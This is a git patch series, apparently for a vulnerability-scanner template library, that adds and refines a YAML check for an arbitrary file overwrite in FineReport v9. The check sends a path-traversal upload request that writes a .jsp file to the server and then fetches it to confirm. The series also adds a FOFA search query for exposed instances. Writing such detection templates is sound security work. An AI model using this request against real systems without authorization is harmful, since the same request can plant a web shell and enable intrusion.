From 8314db7f2ce274ef2b9b0987ef7131331ddf19ca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 22 Aug 2023 16:57:51 +0530 Subject: [PATCH 1/5] Create fine-report-v9-file-upload.yaml --- .../fine-report-v9-file-upload.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml new file mode 100644 index 0000000000..f96307fe51 --- /dev/null +++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml @@ -0,0 +1,31 @@ +id: fine-report-v9-file-upload + +info: + name: FineReport v9 Arbitrary File Overwrite + author: SleepingBag945 + severity: critical + reference: + - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py + tags: apache,solr,lfi + +variables: + string: '{{rand_base(8, "abc")}}' + +http: + - raw: + - | + POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/xml;charset=UTF-8 + + {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"} + + - | + GET /WebReport/{{randstr}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body_2 + words: + - "{{string}}" From dfcc100ee02cf9b859af27a10cbe9d995aaab888 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 22 Aug 2023 16:58:57 +0530 Subject: [PATCH 2/5] Update and rename finereport-path-traversal.yaml to finereport-path-traversal.yaml --- .../{other => finereport}/finereport-path-traversal.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/vulnerabilities/{other => finereport}/finereport-path-traversal.yaml (100%) diff --git a/http/vulnerabilities/other/finereport-path-traversal.yaml b/http/vulnerabilities/finereport/finereport-path-traversal.yaml similarity index 100% rename from http/vulnerabilities/other/finereport-path-traversal.yaml rename to http/vulnerabilities/finereport/finereport-path-traversal.yaml index 7aa815c043..c68ffc17ce 100644 --- a/http/vulnerabilities/other/finereport-path-traversal.yaml +++ b/http/vulnerabilities/finereport/finereport-path-traversal.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 - tags: finereport,lfi metadata: max-request: 2 + tags: finereport,lfi http: - method: GET From 91b994de95c3e0b408007267035d3221beb41f3b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 22 Aug 2023 17:01:02 +0530 Subject: [PATCH 3/5] updated tags --- http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml index f96307fe51..ba7ab7f797 100644 --- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml +++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml @@ -6,7 +6,7 @@ info: severity: critical reference: - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py - tags: apache,solr,lfi + tags: finereport,fileupload,intrusive variables: string: '{{rand_base(8, "abc")}}' From 450c8454ff77a579c56312a98e11dd0e4661b3e2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 22 Aug 2023 17:03:04 +0530 Subject: [PATCH 4/5] Updated metadata --- .../finereport/fine-report-v9-file-upload.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml index ba7ab7f797..d459305d62 100644 --- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml +++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml @@ -5,7 +5,9 @@ info: author: SleepingBag945 severity: critical reference: - - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.py + - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp. + metadata: + fofa-query: app="帆软-FineReport" tags: finereport,fileupload,intrusive variables: From 5f712d1d8d77f65c45d40e01689b3a1f1ca50ecd Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 23 Aug 2023 18:50:56 +0530 Subject: [PATCH 5/5] added filename variable --- .../finereport/fine-report-v9-file-upload.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml index d459305d62..848d31bce2 100644 --- a/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml +++ b/http/vulnerabilities/finereport/fine-report-v9-file-upload.yaml @@ -12,18 +12,19 @@ info: variables: string: '{{rand_base(8, "abc")}}' + filename: '{{rand_base(8)}}' http: - raw: - | - POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{randstr}}.jsp HTTP/1.1 + POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml;charset=UTF-8 {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"} - | - GET /WebReport/{{randstr}}.jsp HTTP/1.1 + GET /WebReport/{{filename}}.jsp HTTP/1.1 Host: {{Hostname}} matchers: